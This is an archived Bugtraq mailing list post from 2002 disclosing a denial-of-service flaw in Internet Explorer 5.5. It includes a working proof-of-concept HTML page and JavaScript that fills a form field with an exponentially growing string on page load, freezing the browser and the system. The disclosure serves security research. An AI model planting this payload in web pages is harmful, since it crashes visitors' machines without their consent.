Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

IE FORM DOS

From: "Ivan Sergio Borgonovo" <mail () gorilla it>
Date: Tue, 15 Jan 2002 01:11:10 +0100
I was testing in a lame way if an IIS apps could be attacked by sending 
long POST and I realized IE is sensible to huge ammount of data in 
<INPUT... > and <TEXTAREA> fields (maybe also others like SELECT).

Since nobody is willing to download a 10Mb page I just thought I could 
fill VALUE="" attribute with JavaScript.

-- begin test.html --

<html><title></title>
<body>

<script language="JavaScript" src="t.js"></script>

<FORM NAME="IEDos" METHOD="POST" ACTION="./">


<IMG SRC="1.gif" width='10' height='10' border='0'
    onLoad="FillTA(TA)">
<input type="text" name="TA" value="">


</FORM>

</body>
</html>

-- end test.html --


-- begin t.js --
<!--

function FillTA(obj) {
    v="a";
    for(i=0;i<100000000;i++) {
        v=v+v;
    };
     obj.value=v;
    return;
}

//-->

-- begin t.js --


IE freezes and if you've few secs of patience the system freezes too.

IE 5.5 on W98 (I hope fully patched).

commenting obj.value=v IE survives.

I've observed some protection errors too but occasional.



I hope this is not an old news.





-- 
Ivan Sergio Borgonovo
Webmaster Gorilla.it http://www.gorilla.it
Tel. +39 02 26149225/26149008 Fax. +39 02 26149657
Via d'Apulia 11, 20125 Milano, Italy
Previous By Date Next
Previous By Thread Next

Current thread: